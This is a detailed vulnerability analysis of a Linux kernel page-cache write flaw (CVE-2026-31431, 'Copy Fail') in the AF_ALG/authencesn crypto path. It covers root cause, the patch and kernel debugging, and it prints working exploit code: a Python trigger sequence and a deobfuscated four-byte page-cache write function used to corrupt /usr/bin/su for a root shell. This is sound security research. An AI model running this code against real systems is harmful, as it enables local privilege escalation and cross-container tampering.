1. Introduction
In late April 2026, security researcher Taeyang Lee publicly disclosed a Linux kernel vulnerability assigned CVE-2026-31431 and gave it an ironic name: Copy Fail.
The name captures the essence of the bug. In 2017, a kernel developer fixed an AF_ALG crypto-interface bug where AAD was not copied from src to dst. The fix introduced an in-place optimization. The optimization was reasonable by itself, but it unintentionally broke a long-standing implicit assumption in another module of the kernel crypto subsystem, authencesn: the destination buffer is contiguous kernel memory, and writing a few bytes into it has no side effects.
When these two independent subsystems meet the Page Cache through splice(), an unprivileged local user can write four controlled bytes into the page cache of any readable file on the system.
This is not a conventional out-of-bounds write or use-after-free. Its impact is more subtle and more far-reaching:
- Local privilege escalation: repeated writes can overwrite the ELF header of /usr/bin/su and lead to a root shell.
- Zero-privilege cross-container attack: containers in different namespaces on the same host can share the page cache for image layers, allowing one container to corrupt binaries used by another container.
- Read-only mount bypass: the target file only needs to be opened with O_RDONLY; a read-only volume no longer prevents page-cache modification.
- Default security controls fail to stop it: the default Docker/Kubernetes seccomp profile and the SELinux targeted policy do not block exploitation.
The vulnerability affects mainstream Linux distribution kernels released between 2017 and 2026 and remained latent for almost nine years. It is rated CVSS 7.8 High.
Timeline
| Date | Event |
|---|---|
| 2011 | The authencesn module was introduced. The ESN scratch write was harmless in its original usage. |
| 2015 | AF_ALG gained AEAD and splice support, but still used an out-of-place design. |
| 2017-07 | Commit 72548b093ee3 introduced the in-place optimization and created the vulnerable behavior. |
| 2026-03-23 | The bug was reported to the Linux kernel security team. |
| 2026-04-01 | Patch a664bf3d603d was merged into mainline. |
| 2026-04-22 | CVE-2026-31431 was assigned. |
| 2026-04-29 | Public disclosure. |
| 2026-05-01 | CISA added the issue to the KEV catalog, with a remediation due date of 2026-05-15. |
| 2026-05-04 | Docker 29.4.2 changed the default seccomp behavior to block AF_ALG; RHEL 9 and 10 kernel fixes were released. |
| 2026-05-06 | Docker 29.4.3 fixed the 29.4.2 regression and switched to AppArmor/SELinux enforcement for AF_ALG; RHEL 8 fixes were released. |
| 2026-05-07 | Dirty Frag, affecting ESP/RxRPC subsystems with a similar primitive, was publicly disclosed. |
This article starts with the background needed to understand the trigger path, then walks through root cause analysis, PoC behavior, and kernel-level dynamic validation. It then systematically explores host privilege-escalation paths and container attack scenarios, including their practical boundaries. The final sections cover mitigation and a page-cache integrity detection design based on O_DIRECT and fanotify.
2. Background
Understanding Copy Fail requires several kernel concepts. Their dependencies can be summarized as follows:
Scatterlist (SGL) AEAD Crypto Page Cache
| | | |
scatterwalk AAD authencesn splice()
| | | |
+--------+-------+ | |
| | |
AF_ALG -------------+ |
| |
algif_aead --------------------------+
We will go through them one by one.
2.1 Page Cache: Linux's Global File Cache
When a process reads /usr/bin/cat through read(), the kernel does not fetch the data from disk every time. It first checks a memory area called the Page Cache. If the corresponding file page is already cached, the kernel returns the cached data directly.
Several Page Cache properties are directly relevant to this vulnerability:
Globally shared. The Page Cache is indexed by (inode, page_offset). It does not belong to any specific process. All processes on the same machine that access the same inode hit the same page-cache entry. After process A loads a file into the page cache through read(), process B reads the same file from cache without touching disk again.
Writeback semantics. For modifications made through the normal write() path, the kernel marks the page as dirty and later writes it back to disk through the writeback mechanism. If a kernel path bypasses the VFS layer and directly modifies a page-cache page, the dirty bit is not set. The modification only lives in memory and disappears after reboot or after the page is dropped from cache.
Immediate visibility. Once a page-cache page is modified, later read() calls immediately see the modified content, regardless of how that modification happened. This includes other processes on the same host and, in container environments, processes that share the same lower-layer inode through overlayfs. Section 6.1 covers that in detail.
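The three properties can be pictured with a toy model. The sketch below is not kernel code: ToyPageCache, its method names, and the inode number 42 are hypothetical, and a Python dict stands in for the real (inode, page_offset) index. It only illustrates that a modification made outside the normal write path is visible to every reader, is never marked dirty, and vanishes once the page is evicted.

```python
PAGE_SIZE = 4096


class ToyPageCache:
    """Toy stand-in for the kernel page cache, keyed by (inode, page_index)."""

    def __init__(self, disk):
        self.disk = disk      # inode -> bytes stored "on disk"
        self.pages = {}       # (inode, page_index) -> bytearray
        self.dirty = set()    # keys of pages that writeback would flush

    def _page(self, inode, index):
        key = (inode, index)
        if key not in self.pages:  # cache miss: load the page from "disk"
            start = index * PAGE_SIZE
            self.pages[key] = bytearray(self.disk[inode][start:start + PAGE_SIZE])
        return self.pages[key]

    def read(self, inode, offset, length):
        """Buffered read; for brevity it must stay within a single page."""
        index, start = divmod(offset, PAGE_SIZE)
        return bytes(self._page(inode, index)[start:start + length])

    def vfs_write(self, inode, offset, data):
        """Normal write() path: modify the page and mark it dirty."""
        index, start = divmod(offset, PAGE_SIZE)
        self._page(inode, index)[start:start + len(data)] = data
        self.dirty.add((inode, index))

    def raw_page_write(self, inode, offset, data):
        """A kernel path that touches the page directly: no dirty bit is set."""
        index, start = divmod(offset, PAGE_SIZE)
        self._page(inode, index)[start:start + len(data)] = data

    def drop_caches(self):
        """Evict clean pages only; dirty pages stay until written back."""
        self.pages = {k: v for k, v in self.pages.items() if k in self.dirty}


cache = ToyPageCache({42: b"original file content"})
cache.raw_page_write(42, 0, b"XXXX")
seen_by_other_reader = cache.read(42, 0, 8)   # every reader shares the same page
is_dirty = (42, 0) in cache.dirty
cache.drop_caches()
after_drop = cache.read(42, 0, 8)             # page is reloaded from "disk"
print(seen_by_other_reader, is_dirty, after_drop)
```

In this model the raw write shows up in the next read, the dirty set stays empty, and dropping the cache brings back the on-disk bytes.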

2.2 Scatterlist: Scatter-Gather Lists
Inside the kernel, logically contiguous data, such as a 10 KB encryption payload, is often stored across multiple non-contiguous physical 4 KB pages. To describe which pages and offsets make up that logical data range, the kernel uses scatterlists (SGLs).
Each struct scatterlist entry describes a contiguous physical memory range:
struct scatterlist {
unsigned long page_link; // pointer to struct page, or CHAIN to another SGL array
unsigned int offset; // starting offset inside the page
unsigned int length; // data length
};
When a single SGL array is not enough, multiple arrays can be connected through SG_CHAIN. The final entry no longer points to a data page; instead, its page_link points to the start of another SGL array. The scatterwalk iterator hides this linked structure from callers.
The design is sound by itself. The problem appears when some entries in the SGL do not point to ordinary kernel-allocated memory but to pages in the page cache. A write to such an SGL entry is equivalent to directly modifying cached file content. That is the core exploitation point in Copy Fail.
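To make the aliasing concrete, here is a minimal sketch of a scatterlist walker. Segment and sgl_write are hypothetical names, the chain is flattened into one Python list, and bytearrays stand in for pages. It is an illustration of the idea, not the kernel's scatterwalk implementation.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Segment:
    """Toy stand-in for one scatterlist entry."""
    backing: bytearray   # plays the role of the page that page_link points to
    offset: int          # starting offset inside the backing buffer
    length: int          # number of bytes this entry covers


def sgl_write(segments: List[Segment], start: int, data: bytes) -> None:
    """Write data at logical offset start, walking the entries in order."""
    seg_start = 0        # logical offset where the current entry begins
    written = 0
    for seg in segments:
        seg_end = seg_start + seg.length
        if written < len(data) and start + written < seg_end:
            inner = start + written - seg_start          # offset inside this entry
            n = min(seg.length - inner, len(data) - written)
            base = seg.offset + inner
            seg.backing[base:base + n] = data[written:written + n]
            written += n
        seg_start = seg_end
    if written != len(data):
        raise ValueError("write runs past the end of the SGL")


kernel_buf = bytearray(8)                                  # ordinary kernel memory
cached_page = bytearray(b"file data on a cached page")    # stands in for a page-cache page
sgl = [Segment(kernel_buf, 0, 8), Segment(cached_page, 5, 4)]

# Logical offset 8 is the first byte of the second entry.
sgl_write(sgl, 8, b"ZZZZ")
print(bytes(cached_page))
```

The caller only supplies a logical offset. Which memory actually changes depends entirely on what the entry at that offset points to.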

2.3 splice: The Cost of Zero Copy
splice() is a high-performance Linux data-transfer system call. Its main idea is to avoid copying data back and forth between kernel space and user space. Instead, it moves page references between kernel pipe buffers.
A normal read() plus write() flow copies file data into a user-space buffer and then copies it back into the kernel for the destination. splice() directly transfers references to the file's page-cache pages to the other side of a pipe, without copying the data itself.

In the AF_ALG crypto interface, splice() can feed file content directly into a crypto algorithm. The file's page-cache pages are placed directly into the TX SGL. The page_link fields in those SGL entries point to globally shared page-cache pages. This is the critical design decision: if any later code path writes to that SGL, it writes to the file's page cache.
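The difference between copying bytes and passing a reference can be shown with a pure-Python analogy. This is not a splice() call: a bytearray stands in for a page-cache page, and a memoryview stands in for the page reference that splice() hands to the consumer.

```python
page_cache_page = bytearray(b"contents of a cached file page")

# read() + write(): the consumer gets an independent copy of the bytes.
copied = bytes(page_cache_page)

# splice(): the consumer gets a reference to the same underlying page.
spliced = memoryview(page_cache_page)

# A later write through the reference changes the shared page itself.
spliced[0:4] = b"XXXX"

copy_head = copied[:8]                     # the copy still holds the old bytes
page_head = bytes(page_cache_page[:8])     # the shared page holds the new bytes
print(copy_head, page_head)
```

A consumer holding the copy can scribble on it freely. A consumer holding the reference cannot, because every write is a write to the file's cached content.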
2.4 AF_ALG: User-Space Crypto Interface
The Linux kernel exposes a crypto API to user space through AF_ALG (Address Family: Algorithm). The API is socket-based:
import socket, os
AF_ALG = 38
SOL_ALG = 279
# 1. Create an AF_ALG socket and choose the crypto algorithm.
alg_sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
# Bind the algorithm name, for example an AEAD algorithm such as gcm(aes).
alg_sock.bind(("aead", "gcm(aes)"))
alg_sock.setsockopt(SOL_ALG, 1, key_bytes) # ALG_SET_KEY
alg_sock.setsockopt(SOL_ALG, 5, None, 16) # ALG_SET_AEAD_AUTHSIZE (option 4 is ALG_SET_AEAD_ASSOCLEN)
# 2. accept() returns an operation socket.
op_sock = alg_sock.accept()[0]
# 3. sendmsg() sends data to be encrypted or decrypted.
# Control messages specify operation type, IV, AAD length, and other parameters.
op_sock.sendmsg([plaintext_data], control_messages)
# 4. recv() receives the result. The kernel performs the actual crypto operation here.
result = op_sock.recv(output_buffer_size)
AF_ALG also supports feeding file content to a crypto algorithm through splice(), avoiding copies between kernel space and user space. This feature is essential to the Copy Fail exploit chain: the data that enters through splice is stored in the TX SGL as page-cache page references, not as copied bytes.
In the kernel, algif_aead.c handles AEAD requests. It manages the TX SGL, which contains data sent by the user, and the RX SGL, which points to the user's receive buffer. It eventually calls a lower-level crypto algorithm, such as authencesn, to perform the actual encryption or decryption.
2.5 AEAD and authencesn's Scratch Write
AEAD stands for Authenticated Encryption with Associated Data. It provides confidentiality and integrity at the same time. Its data format is:
Input: AAD (Associated Data) || Ciphertext || Auth Tag
Output: AAD || Plaintext
AAD is associated data that is not encrypted but is authenticated. Ciphertext is the encrypted data, and Auth Tag is the authentication tag.
authencesn is an AEAD implementation in the Linux kernel. Its full name is "authenc with Extended Sequence Number". It was designed for IPsec ESN.
What AAD means
In AEAD, AAD is additional data that must be authenticated but does not need to be encrypted. In TLS, AAD can be the record header: content type, protocol version, and length. In IPsec, AAD includes the security parameter index and sequence number. The concrete content varies by protocol, but the AEAD layer only needs to know that the first assoclen bytes are AAD.
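As a small illustration of that layout, the sketch below splits a decryption input into its three parts using only assoclen and the tag size. The function name split_aead_input and the sample bytes are made up for the example.

```python
from typing import NamedTuple


class AeadInput(NamedTuple):
    aad: bytes
    ciphertext: bytes
    tag: bytes


def split_aead_input(buf: bytes, assoclen: int, authsize: int) -> AeadInput:
    """Interpret buf as AAD || Ciphertext || Auth Tag."""
    if assoclen < 0 or authsize < 0 or assoclen + authsize > len(buf):
        raise ValueError("buffer is shorter than assoclen + authsize")
    tag_start = len(buf) - authsize
    return AeadInput(
        aad=buf[:assoclen],               # authenticated, not encrypted
        ciphertext=buf[assoclen:tag_start],
        tag=buf[tag_start:],              # checked during decryption
    )


parts = split_aead_input(b"HDRHDRHD" + b"ciphertext-bytes" + b"TAG!",
                         assoclen=8, authsize=4)
print(parts)
```

Nothing in the byte stream marks the boundaries. The AEAD layer trusts the lengths it is given, which is why the caller's choice of assoclen and tag size decides how each byte is interpreted.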
Why authencesn writes into the dst buffer
The ESN protocol uses a 64-bit sequence number to prevent wraparound attacks. Only the low 32 bits are transmitted on the wire; the high 32 bits are maintained locally by the peers. authencesn needs the full 64-bit sequence number during HMAC computation. It handles this as follows:
- Put the high 32 bits of the sequence number in AAD[4:8].
- Before calculating HMAC, temporarily write AAD[4:8] into the place in the destination buffer where the auth tag normally resides, so the HMAC covers the full sequence number.
- Restore state after HMAC calculation.
This temporary write is the ESN scratch write:
// crypto/authencesn.c - crypto_authenc_esn_decrypt()
// Read the first eight bytes from AAD.
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0);
// In the IPsec case: tmp[0] = SPI, tmp[1] = SeqNo_Hi
unsigned int cryptlen = req->cryptlen;
cryptlen -= authsize; // locate the beginning of the auth-tag area
// Temporarily write AAD[4:8] into the tag area in dst for HMAC calculation.
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
// ^^^^^^^^ ^
// AAD[4:8] 4 bytes, 1 = write
The write size is hard-coded to four bytes (sizeof(u32)), and the value comes from AAD[4:8].
In normal IPsec usage, req->dst points to a contiguous buffer allocated by the kernel with kmalloc, and AAD[4:8] is legitimate sequence-number data. The temporary write and restoration are harmless.
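For readers unfamiliar with ESN, the following sketch shows how a 64-bit sequence number splits into the two 32-bit halves and where the high half sits in the first eight AAD bytes, following the SPI / SeqNo_Hi layout noted in the code comment above. The helper names are hypothetical, and big-endian packing is assumed because these are network-protocol fields.

```python
import struct
from typing import Tuple


def split_esn(seq64: int) -> Tuple[int, int]:
    """Split a 64-bit extended sequence number into (high, low) 32-bit halves."""
    if not 0 <= seq64 < 2 ** 64:
        raise ValueError("sequence number must fit in 64 bits")
    return seq64 >> 32, seq64 & 0xFFFFFFFF


def first_eight_aad_bytes(spi: int, seq64: int) -> bytes:
    """AAD[0:4] = SPI, AAD[4:8] = SeqNo_Hi (assumed big-endian)."""
    seq_hi, _seq_lo = split_esn(seq64)
    return struct.pack(">II", spi, seq_hi)


seq = 0x0000000500000003
hi, lo = split_esn(seq)
aad_head = first_eight_aad_bytes(spi=0x11223344, seq64=seq)
print(hi, lo, aad_head.hex())
```

In legitimate traffic AAD[4:8] is therefore a slowly changing counter value. The algorithm itself has no way to tell a counter from four arbitrary bytes.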
The attack surface opened by AF_ALG
Through AF_ALG, however, user space can directly invoke the authencesn algorithm and fully control the AAD content. authencesn does not validate whether AAD[4:8] is a real ESN sequence number. It simply writes these four bytes into a fixed offset of dst.
If the attacker places the desired page-cache bytes in AAD[4:8], authencesn faithfully writes them to a fixed offset of dst.
The obvious question is: what if req->dst does not contain a kmalloc buffer, but page-cache pages?
3. Root Cause Analysis
3.1 How the Vulnerability Was Introduced: A Reasonable Optimization
In July 2017, kernel developer Stephan Mueller submitted commit 72548b093ee3, titled "crypto: algif_aead - copy AAD from src to dst".
The commit fixed a real bug. Before this change, the algif_aead decryption path used an out-of-place mode:
// Before 2017: out-of-place
aead_request_set_crypt(&areq->aead_req,
areq->tsgl, // req->src = TX SGL (input data)
areq->first_rsgl.sgl.sg, // req->dst = RX SGL (user receive buffer)
used, ctx->iv);
The TX SGL contained all data sent through sendmsg() and splice(): AAD, ciphertext, and authentication tag. The RX SGL pointed to the user-space receive buffer. The AEAD specification requires the decrypted output to include AAD, but lower-level algorithms only process the ciphertext. The caller must copy AAD from src to dst. The old algif_aead code did not do that, so the AAD area in the user's output was zeroed.
Commit 72548b093ee3 fixed this in three steps:
- Copy AAD and ciphertext from TX SGL to the RX buffer using memcpy_sglist, so AAD appears in the output.
- Chain the TX SGL pages that contain the auth tag to the tail of the RX SGL through sg_chain(), because AEAD decryption still needs the tag for authentication, even though the tag is not part of the output.
- Set req->src = req->dst = RX SGL, where the RX SGL now contains AAD, ciphertext, and the chained tag pages.
// Vulnerable code after 2017: in-place
// Step 1: copy AAD + ciphertext into the RX buffer
memcpy_sglist(rsgl, tsgl_src, outlen); // outlen = assoclen + cryptlen - authsize
// Step 2: pull tag pages from the TX SGL
af_alg_pull_tsgl(sk, processed, areq->tsgl, processed - as);
// Step 3: chain them to the tail of the RX SGL
sg_chain(rsgl_sg, rsgl_nents, areq->tsgl);
// Step 4: in-place, src and dst both point to the combined RX SGL
aead_request_set_crypt(&areq->aead_req,
rsgl_src, // req->src = RX SGL, including chained tag pages
rsgl_dst, // req->dst = RX SGL, the same object
used, ctx->iv);
Functionally, this solved the AAD copy bug. The problem is in the tag pages pulled in Step 2. They come from the TX SGL, and data that entered the TX SGL through splice() directly references file page-cache pages. These page-cache pages are now chained into req->dst.
3.2 Conflicting Design Assumptions
The essence of the bug is an implicit assumption conflict between two subsystems:
| Subsystem | Assumption |
|---|---|
| authencesn (2011) | req->dst is a contiguous kmalloc buffer, so a scratch write has no side effects. |
| algif_aead optimization (2017) | The tail of req->dst may contain page-cache pages chained from the TX SGL. |
In every other authencesn call path, mainly IPsec/xfrm, dst is indeed a kernel-allocated contiguous buffer. The algif_aead in-place optimization was the first, and effectively the only, path that could place page-cache pages inside the req->dst SGL.
3.3 Complete Trigger Path

Now let us walk through the whole trigger sequence. Assume the goal is to write four controlled bytes at offset t in a target file.
Step 1: user space sends data
The exploit uses the following parameters:
- assoclen = 8, specified through the control message passed to sendmsg.
- authsize = 4, set through setsockopt(ALG_SET_AEAD_AUTHSIZE).
Then data is sent to the AF_ALG socket in two stages:
# Four bytes to write.
evil_bytes = b'\xde\xad\xbe\xef'
# Step 1: send eight bytes of AAD through sendmsg.
# AAD[0:4] = arbitrary padding, AAD[4:8] = bytes to write to the page cache.
# authencesn will treat AAD[4:8] as the ESN seqno_hi and write it to the scratch area.
aad = b'\x00\x00\x00\x00' + evil_bytes # 8 bytes
op.sendmsg([aad], cmsg, MSG_MORE) # MSG_MORE means more data follows.
# Step 2: splice the first t + 4 bytes of the target file into the AF_ALG socket.
# splice passes page-cache page references without copying data.
pipe_r, pipe_w = os.pipe()
target_fd = os.open("/usr/bin/su", os.O_RDONLY)
os.splice(target_fd, pipe_w, t + 4, offset_src=0) # file -> pipe
os.splice(pipe_r, op.fileno(), t + 4) # pipe -> AF_ALG socket
Step 2: TX SGL layout
After the two sends, the kernel's TX SGL contains:
TX SGL:
+--------------------+----------------------------------------+
| sendmsg data (8B) | splice data (t+4 bytes) |
| AAD: 4 zero bytes | file[0:t+4] |
| + evil_bytes | page-cache page refs via splice |
| (kmalloc memory) | (points to GLOBAL SHARED page cache) |
+--------------------+----------------------------------------+
From AEAD decryption's point of view, this data is interpreted as:
- AAD = the first assoclen=8 bytes = four zero bytes plus evil_bytes from sendmsg.
- Ciphertext = the middle t bytes = file[0:t].
- Auth Tag = the final authsize=4 bytes = file[t:t+4].
Total byte count is 8 + t + 4 = t + 12.
Step 3: recv triggers decryption and in-place SGL construction
Calling recv() triggers _aead_recvmsg(). The vulnerable code does the following:
outlen = assoclen + (cryptlen - authsize) = 8 + ((t+4) - 4) = t + 8
(1) memcpy_sglist(RX buffer, TX SGL, outlen=t+8):
Copy first t+8 bytes of TX SGL to the RX buffer (user-space allocated memory).
RX buffer contents:
[0:8] = copy of AAD (sendmsg data)
[8:8+t] = copy of file[0:t] (ciphertext portion)
Note: this is a DATA COPY, not a page reference.
(2) af_alg_pull_tsgl(TX SGL, skip=t+8, take=4):
Skip the first t+8 bytes of TX SGL and extract the final 4 bytes (tag region).
These four bytes correspond to file[t:t+4] from splice.
-> SGL entry: { page = file's page-cache page, offset = t % 4096, length = 4 }
-> This is the ORIGINAL page-cache reference, not a copy.
(3) sg_chain(RX SGL tail, tag SGL):
Chain the tag page reference to the end of RX SGL.
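The length arithmetic in these three sub-steps can be checked with a few lines of Python. The function name recv_plan and the dictionary keys are illustrative only; the formulas are the ones stated above, with a 4096-byte page size assumed.

```python
PAGE_SIZE = 4096


def recv_plan(t: int, assoclen: int = 8, authsize: int = 4) -> dict:
    """Reproduce the step-3 length arithmetic for a target file offset t."""
    spliced = t + authsize                  # file bytes fed through splice()
    cryptlen = spliced                      # ciphertext plus tag, as AEAD sees it
    outlen = assoclen + (cryptlen - authsize)
    return {
        "tx_total": assoclen + spliced,     # total bytes in the TX SGL
        "outlen": outlen,                   # bytes copied into the RX buffer
        "tag_skip": outlen,                 # bytes skipped before the tag region
        "tag_take": authsize,               # bytes pulled as the tag region
        "tag_page_index": t // PAGE_SIZE,   # which page of the file holds the tag
        "tag_page_offset": t % PAGE_SIZE,   # offset of the tag inside that page
    }


plan = recv_plan(t=5000)
print(plan)
```

For t = 5000 the copy covers 5008 bytes, and the four tag bytes sit at offset 904 of the file's second page.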
The final combined destination SGL, which is also the source SGL, looks like this:
combined dst SGL (= req->src = req->dst):
+-- RX buffer (user-space, safe) ---+ +-- chained tag (PAGE CACHE) ------+
| | | |
| AAD (8B) | ciphertext (tB) |->| file[t:t+4] in page cache |
| | = copy of file[0:t] | | original page ref from splice |
| | | |
+-- offset 0 t+8 -----+ +-- offset t+8 t+12 --+
The key point is that the RX-buffer portion is ordinary user-space receive memory and is safe to write, but the chained tag pages at the tail are original page-cache references from the file.
Step 4: authencesn scratch write hits the page cache
crypto_authenc_esn_decrypt() starts running. The destination offset for the ESN scratch write is computed as follows:
// scratch write in crypto_authenc_esn_decrypt()
// First read AAD[0:8].
scatterwalk_map_and_copy(tmp, req->dst, 0, 8, 0); // tmp[0]=AAD[0:4], tmp[1]=AAD[4:8]
unsigned int cryptlen = req->cryptlen; // = t + 4, ciphertext plus tag
cryptlen -= authsize; // = t + 4 - 4 = t
// Write tmp[1] (= AAD[4:8] = evil_bytes) into dst[assoclen + cryptlen].
scatterwalk_map_and_copy(tmp + 1, req->dst, assoclen + cryptlen, 4, 1);
// ^^^^^^^^ ^^^^^^^^^^^^^^^^ ^
// = AAD[4:8] = 8 + t write direction
// = evil_bytes
The write position is offset 8 + t in the destination SGL. Comparing that with the combined SGL layout above:
- The RX-buffer portion occupies [0, t+8), for a total of t+8 bytes.
- The chained tag pages start at offset t+8.
Therefore, 8 + t is exactly the boundary of the RX buffer and the start of the chained tag pages.
Those tag pages are original page-cache references to file[t:t+4]. The scratch write therefore writes four bytes to offset t of the file's page cache.
The written value is tmp[1] = AAD[4:8] = evil_bytes, supplied through sendmsg.
At this point the chain is complete: the write offset is controlled by the splice() length, which determines t, and the write content is controlled by AAD[4:8] from sendmsg. Both are freely controlled from user space.
Why the write is not undone
After decryption, crypto_authenc_esn_decrypt_tail() attempts to restore data overwritten by the scratch write. The critical detail is that it first reads the current value at dst[8+t], which is already the payload, and then writes AAD back to dst[0:8]. It never writes the original value back to dst[8+t].
The HMAC verification will fail because the data has been modified, and recvmsg returns -EBADMSG. But the page-cache write has already happened and is not rolled back. An exploit simply ignores this error.
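The missing restore is easiest to see in a toy replay of the writes to dst. The sketch below uses one flat bytearray in place of the combined SGL, so the last four bytes stand in for the chained page-cache page. The function name is hypothetical, and the tail's read of dst[4:8] is an assumption made so that the eight-byte restore reproduces the original AAD.

```python
def esn_dst_writes(dst: bytearray, assoclen: int, cryptlen: int, authsize: int) -> None:
    """Toy replay of the dst writes: two in decrypt, one in decrypt_tail."""
    tag_off = assoclen + (cryptlen - authsize)

    # crypto_authenc_esn_decrypt(): read AAD[0:8], then perform two writes.
    tmp = bytes(dst[0:8])
    dst[4:8] = tmp[0:4]
    dst[tag_off:tag_off + 4] = tmp[4:8]        # the ESN scratch write

    # HMAC verification would run here; its outcome does not undo anything.

    # crypto_authenc_esn_decrypt_tail(): rebuild the first eight bytes only.
    tmp0 = bytes(dst[4:8])
    tmp1 = bytes(dst[tag_off:tag_off + 4])     # reads back the scratch value
    dst[0:8] = tmp0 + tmp1


aad = b"\x00" * 4 + b"\xde\xad\xbe\xef"
file_bytes = b"ABCDEFGH"
t = 3
dst = bytearray(aad + file_bytes[:t] + file_bytes[t:t + 4])

esn_dst_writes(dst, assoclen=8, cryptlen=t + 4, authsize=4)
restored_aad = bytes(dst[0:8])
tag_area = bytes(dst[8 + t:8 + t + 4])
print(restored_aad.hex(), tag_area.hex())
```

The first eight bytes come back exactly as they were, while the tag area keeps the scratch value. In the model, the original bytes "DEFG" are gone for good.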
3.4 Control Analysis
Write offset. The attacker controls t by adjusting the splice() length, which is t + authsize = t + 4. Each invocation can target an arbitrary file offset.
Write value. The attacker fully controls AAD[4:8], sent through sendmsg.
Write size. The write size is fixed at four bytes. It is not controlled by setsockopt(ALG_SET_AEAD_AUTHSIZE). authsize only affects the offset calculation through cryptlen -= authsize. The four-byte size is hard-coded in authencesn as sizeof(u32), the size of the high 32 bits of the ESN sequence number. A single call cannot change the size, but repeated calls can overwrite a continuous file range.
Target file. Any file the current user can read is a target. The PoC opens the file with O_RDONLY. No write permission is required because the write path bypasses VFS permission checks.
Summary:
Write target: file page cache[t : t+4]
Write value: AAD[4:8] sent through sendmsg (4 bytes, fully controlled)
Write size: fixed 4 bytes (u32 hard-coded in authencesn)
Trigger: assoclen=8, authsize=4, splice length=t+4
Permission: O_RDONLY is enough; no write permission required
Root cause: chained tag pages at the tail of dst SGL are original page-cache references from splice
3.5 Patch Analysis
The fix, commit a664bf3d603d, states:
This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings.
The fix removes in-place mode and makes req->src and req->dst point to different SGLs again:
// After the fix: out-of-place
// src = TX SGL, which may contain page-cache pages, but is read-only
// dst = RX SGL, a pure user-space buffer
aead_request_set_crypt(&areq->aead_req,
tsgl_src, // req->src = TX SGL
rsgl_dst, // req->dst = RX SGL, independent
used, ctx->iv);
// AAD is explicitly copied into the RX buffer.
memcpy_sglist(rsgl_src, tsgl_src, ctx->aead_assoclen);
After the fix, req->dst only contains the user's RX buffer. It no longer contains page-cache pages. The authencesn scratch write lands in the user's receive buffer and has no security impact.
The patch removes roughly 92 lines of code: tag-page chaining, the in-place branch, the offset parameter added to af_alg_pull_tsgl, and other complexity needed only for in-place operation. The sg_chain() call is eliminated completely, so page-cache pages no longer have a path into req->dst.
4. PoC Analysis and Dynamic Validation
4.1 Public PoC Structure
The public Copy Fail PoC is a heavily obfuscated 732-byte Python script. It nests the real exploit code through base64 and zlib compression. After deobfuscation, the core is a function named page_cache_write_4bytes(fd, offset, value), which executes the trigger path described above and writes four bytes to the page cache of the file represented by fd.
The full PoC flow is:
- Open /usr/bin/su, a SUID-root binary, as read-only.
- Repeatedly call page_cache_write_4bytes() to overwrite the first 160 bytes of /usr/bin/su's ELF header with a carefully constructed ELF payload containing shellcode for a root shell.
- Execute the modified /usr/bin/su and obtain a root shell.
One important detail is that the PoC opens the target with O_RDONLY. Normal VFS writes through a read-only file descriptor would be rejected by the kernel. Copy Fail does not use the VFS write path; it writes to page-cache pages through the crypto subsystem's scratch write. Therefore any readable file is a potential target, including files mounted read-only.
4.2 Core Function
The deobfuscated core function, aligned with the data flow in Section 3, is:
AF_ALG = 38
SOL_ALG = 279
ASSOCLEN = 8 # AAD length
AUTHSIZE = 4 # auth-tag size; also affects offset calculation
def page_cache_write_4bytes(fd, offset, value):
"""Write value (4 bytes) to page_cache[offset : offset+4] of the file represented by fd."""
# Create an AF_ALG socket and bind authencesn(hmac(sha256),cbc(aes)).
s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
s.setsockopt(SOL_ALG, 2, # ALG_SET_KEY: all-zero key, content does not affect the trigger
b'\x08\x00\x01\x00' # rtattr header
b'\x00\x00\x00\x10' # enckeylen=16 (AES-128)
+ b'\x00' * 32) # 16B authkey + 16B enckey
s.setsockopt(SOL_ALG, 4, None, AUTHSIZE) # ALG_SET_AEAD_AUTHSIZE = 4
op = s.accept()[0]
# Build 8 bytes of AAD: first 4 bytes are zero padding, last 4 bytes are the value.
# authencesn writes AAD[4:8] (= value) to dst[assoclen + cryptlen].
aad = b'\x00' * 4 + value # 8 bytes
op.sendmsg([aad],
[(SOL_ALG, 2, b'\x00' * 4), # ALG_OP_DECRYPT
(SOL_ALG, 3, b'\x10' + b'\x00' * 19), # IV = 16 zero bytes
(SOL_ALG, 4, struct.pack('I', ASSOCLEN))], # assoclen = 8
socket.MSG_MORE)
# splice target file [0, offset+4) into the AF_ALG socket.
# splice passes page-cache page references without copying.
pr, pw = os.pipe()
os.splice(fd, pw, offset + AUTHSIZE, offset_src=0)
os.splice(pr, op.fileno(), offset + AUTHSIZE)
try:
op.recv(ASSOCLEN + offset) # triggers _aead_recvmsg -> authencesn scratch write
except OSError:
pass # HMAC failure returns EBADMSG, but the page-cache write has completed
op.close(); s.close(); os.close(pr); os.close(pw)
4.3 QEMU and GDB Kernel-Level Validation
To validate the full trigger path at kernel level, I built a controlled debugging environment: Linux 6.12.8 with debug symbols running inside QEMU, with GDB connected remotely and breakpoints placed on key functions to capture the complete execution chain.
Experiment code
The scripts and configuration files for this section are in the QEMU debug environment package. The GDB breakpoint scripts are separate. URL links have been intentionally removed from this blog version.
4.3.1 Building the Debug Environment
The debug environment is built through Docker to avoid setting up a cross-compilation toolchain on macOS. It produces three files: a compressed kernel bzImage, a debug-symbol vmlinux, and an initramfs containing BusyBox and the PoC utility.
# Build kernel + BusyBox + PoC through Docker. This takes about ten minutes.
docker build -t copyfail-build -f Dockerfile .
docker run --rm -v $(pwd)/output:/output copyfail-build
# Outputs:
# output/bzImage - compressed kernel (4.8 MB)
# output/vmlinux - DWARF debug symbols (126 MB), used by GDB
# output/rootfs.cpio.gz - initramfs, including BusyBox and poc_pagecache_write
Key kernel configuration options:
CONFIG_CRYPTO_USER_API_AEAD=y # AF_ALG AEAD interface
CONFIG_CRYPTO_AUTHENC=y # authenc module
CONFIG_CRYPTO_SEQIV=y # sequence-number IV
CONFIG_DEBUG_INFO_DWARF5=y # full debug symbols
CONFIG_GDB_SCRIPTS=y # GDB helper scripts
CONFIG_KALLSYMS_ALL=y # expose all kernel symbols
Start the QEMU VM:
# Normal mode: boot directly into a shell.
./run_qemu.sh
# Debug mode: QEMU pauses and waits for GDB on :1234.
./run_qemu.sh debug
Connect from another terminal:
gdb ./vmlinux -ex 'target remote :1234' -ex 'continue'
